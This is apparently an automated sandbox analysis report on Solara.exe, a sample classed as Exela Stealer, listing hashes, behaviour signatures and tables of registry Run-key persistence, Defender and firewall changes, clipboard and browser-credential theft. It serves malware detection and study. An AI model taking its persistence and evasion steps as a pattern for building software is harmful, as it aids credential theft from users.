exelastealer | b1883486b5e6da993af6deb6f4d0f524ccdc6317bdc32ed50dccd1799867a3bd

Resubmissions

12/01/2025, 14:35

250112-rx8vssyndp 10

12/01/2025, 06:09

250112-gwmwtszmbt 10

Analysis

max time kernel
899s
max time network
898s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
12/01/2025, 14:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Solara.exe
Size

13.7MB
MD5

cc6d7a6b17febe201b7f7d26ce944c08
SHA1

231e8439c0facca7cc4b730bf950351d48e3a7c2
SHA256

b1883486b5e6da993af6deb6f4d0f524ccdc6317bdc32ed50dccd1799867a3bd
SHA512

c2abd5a8a59e09951df3d17b591442097cb2615a57abbef9afee9660dcd59ece483ca9a6ab4e83a622235eef4c75ef64dc2b32b58829cef8c485e1517e9ba652
SSDEEP

393216:KsEANEX3gBGYVwwoE0VhUqE7SlO9h4m/a360m:KhIEX3kGN/XBEWs4EA60m

Score

10^/10

exelastealer collection defense_evasion discovery evasion execution persistence privilege_escalation pyinstaller ransomware spyware stealer upx

Malware Config

Signatures

Exela Stealer
Exela Stealer is an open source stealer originally written in .NET and later transitioned to Python that was first observed in August 2023.
stealer exelastealer
Exelastealer family
exelastealer
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Renames multiple (245) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

Command and Scripting Interpreter: PowerShell 1 TTPs 64 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2768	Process not Found
3156	powershell.exe
2012	powershell.exe
2368	powershell.exe
4456	Process not Found
3784	Process not Found
3548	Process not Found
4572	Process not Found
4064	powershell.exe
3156	Process not Found
1648	Process not Found
4496	Process not Found
4396	Process not Found
3156	Process not Found
5112	powershell.exe
1340	Process not Found
956	Process not Found
1716	Process not Found
3456	Process not Found
5068	Process not Found
3576	powershell.exe
4544	powershell.exe
4020	Process not Found
4480	Process not Found
1216	Process not Found
4772	powershell.exe
3348	powershell.exe
4536	powershell.exe
2104	powershell.exe
3856	Process not Found
60	Process not Found
2448	powershell.exe
520	powershell.exe
1408	Process not Found
4572	Process not Found
5080	Process not Found
4560	Process not Found
2416	powershell.exe
2460	powershell.exe
464	powershell.exe
604	powershell.exe
676	powershell.exe
3844	Process not Found
2400	Process not Found
4720	Process not Found
4040	powershell.exe
2504	powershell.exe
4536	powershell.exe
2596	Process not Found
1760	Process not Found
1180	powershell.exe
604	powershell.exe
3268	powershell.exe
644	Process not Found
3488	Process not Found
4640	Process not Found
1216	Process not Found
4444	powershell.exe
2884	Process not Found
4744	Process not Found
1228	Process not Found
1444	Process not Found
3740	Process not Found
4420	Process not Found

Modifies Windows Firewall 2 TTPs 20 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
348	Process not Found
2764	Process not Found
2308	Process not Found
4884	Process not Found
2056	netsh.exe
3556	Process not Found
3940	Process not Found
3680	netsh.exe
2776	netsh.exe
4972	netsh.exe
2828	netsh.exe
736	Process not Found
3036	Process not Found
4556	Process not Found
736	netsh.exe
4008	netsh.exe
4724	Process not Found
5000	Process not Found
2680	Process not Found
3148	netsh.exe

Checks computer location settings 2 TTPs 64 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Solara.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Solara.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Solara.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Solara.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Solara.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Solara.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Solara.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Solara.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Solara.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Solara.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Solara.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Solara.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Solara.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Solara.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Solara.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Solara.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Solara.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Solara.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Solara.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Solara.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Solara.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Solara.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Solara.exe

Clipboard Data 1 TTPs 22 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
3488	powershell.exe
3464	cmd.exe
3336	powershell.exe
4636	Process not Found
1076	Process not Found
2380	Process not Found
4940	cmd.exe
5112	Process not Found
4440	Process not Found
1460	Process not Found
212	Process not Found
1444	Process not Found
3424	powershell.exe
4212	cmd.exe
452	powershell.exe
1552	cmd.exe
2644	Process not Found
4992	Process not Found
1732	Process not Found
1200	cmd.exe
4848	powershell.exe
1552	Process not Found

Executes dropped EXE 64 IoCs

pid	Process
2044	Exela.exe
4992	Exela.exe
4644	Exela.exe
1028	Exela.exe
3196	Exela.exe
2928	Exela.exe
4044	Exela.exe
2096	Exela.exe
4696	Exela.exe
2300	Exela.exe
3192	Exela.exe
4304	Exela.exe
1744	Exela.exe
2960	Exela.exe
3696	Exela.exe
1052	Exela.exe
3828	Exela.exe
1924	Exela.exe
4060	Exela.exe
4752	Exela.exe
228	Exela.exe
464	Exela.exe
4152	Exela.exe
3192	Exela.exe
3176	Exela.exe
4012	Exela.exe
3928	Exela.exe
4052	Exela.exe
3056	Exela.exe
1196	Exela.exe
1680	Exela.exe
4980	Exela.exe
2288	Exela.exe
1988	Exela.exe
2028	Exela.exe
4388	Exela.exe
3244	Exela.exe
4928	Exela.exe
4200	Exela.exe
604	Exela.exe
2720	Exela.exe
3928	Exela.exe
3696	Exela.exe
2408	Exela.exe
3444	Exela.exe
520	Exela.exe
4924	Exela.exe
2168	Exela.exe
5012	Exela.exe
1304	Exela.exe
3460	Exela.exe
4060	Exela.exe
1200	Exela.exe
5016	Exela.exe
1320	Exela.exe
4644	Exela.exe
4616	Exela.exe
4732	Exela.exe
4764	Exela.exe
3292	Exela.exe
3748	Exela.exe
4528	Exela.exe
4996	Exela.exe
3676	Exela.exe

Loads dropped DLL 64 IoCs

pid	Process
4992	Exela.exe
4992	Exela.exe
4992	Exela.exe
4992	Exela.exe
4992	Exela.exe
4992	Exela.exe
4992	Exela.exe
4992	Exela.exe
4992	Exela.exe
4992	Exela.exe
4992	Exela.exe
4992	Exela.exe
4992	Exela.exe
4992	Exela.exe
4992	Exela.exe
4992	Exela.exe
4992	Exela.exe
4992	Exela.exe
4992	Exela.exe
4992	Exela.exe
4992	Exela.exe
4992	Exela.exe
4992	Exela.exe
4992	Exela.exe
4992	Exela.exe
4992	Exela.exe
4992	Exela.exe
4992	Exela.exe
4992	Exela.exe
4992	Exela.exe
1028	Exela.exe
1028	Exela.exe
1028	Exela.exe
1028	Exela.exe
1028	Exela.exe
1028	Exela.exe
1028	Exela.exe
1028	Exela.exe
1028	Exela.exe
1028	Exela.exe
1028	Exela.exe
1028	Exela.exe
1028	Exela.exe
1028	Exela.exe
1028	Exela.exe
1028	Exela.exe
1028	Exela.exe
1028	Exela.exe
1028	Exela.exe
1028	Exela.exe
1028	Exela.exe
1028	Exela.exe
1028	Exela.exe
1028	Exela.exe
1028	Exela.exe
1028	Exela.exe
1028	Exela.exe
1028	Exela.exe
1028	Exela.exe
1028	Exela.exe
2928	Exela.exe
2928	Exela.exe
2928	Exela.exe
2928	Exela.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 64 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Solara = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Solara.exe"	Solara.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Solara = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Solara.exe"	Solara.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Exela = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Exela.exe"	Solara.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Solara = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Solara.exe"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Exela = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Exela.exe"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Solara = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Solara.exe"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Exela = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Exela.exe"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Solara = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Solara.exe"	Solara.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Exela = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Exela.exe"	Solara.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Exela = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Exela.exe"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Solara = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Solara.exe"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Exela = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Exela.exe"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Exela = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Exela.exe"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Exela = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Exela.exe"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Exela = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Exela.exe"	Solara.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Exela = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Exela.exe"	Solara.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Exela = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Exela.exe"	Solara.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Exela = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Exela.exe"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Solara = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Solara.exe"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Solara = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Solara.exe"	Solara.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Exela = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Exela.exe"	Solara.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Exela = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Exela.exe"	Solara.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Solara = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Solara.exe"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Solara = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Solara.exe"	Solara.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Solara = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Solara.exe"	Solara.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Solara = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Solara.exe"	Solara.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Exela = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Exela.exe"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Exela = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Exela.exe"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Exela = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Exela.exe"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Solara = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Solara.exe"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Solara = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Solara.exe"	Solara.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Solara = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Solara.exe"	Solara.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Exela = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Exela.exe"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Exela = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Exela.exe"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Exela = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Exela.exe"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Solara = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Solara.exe"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Solara = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Solara.exe"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Exela = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Exela.exe"	Solara.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Exela = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Exela.exe"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Exela = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Exela.exe"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Solara = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Solara.exe"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Solara = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Solara.exe"	Solara.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Exela = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Exela.exe"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Exela = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Exela.exe"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Solara = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Solara.exe"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Solara = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Solara.exe"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Solara = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Solara.exe"	Solara.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Exela = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Exela.exe"	Solara.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Solara = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Solara.exe"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Exela = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Exela.exe"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Solara = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Solara.exe"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Exela = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Exela.exe"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Solara = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Solara.exe"	Solara.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Exela = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Exela.exe"	Solara.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Solara = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Solara.exe"	Solara.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Exela = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Exela.exe"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Exela = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Exela.exe"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Exela = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Exela.exe"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Solara = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Solara.exe"	Solara.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Exela = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Exela.exe"	Solara.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Exela = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Exela.exe"	Process not Found
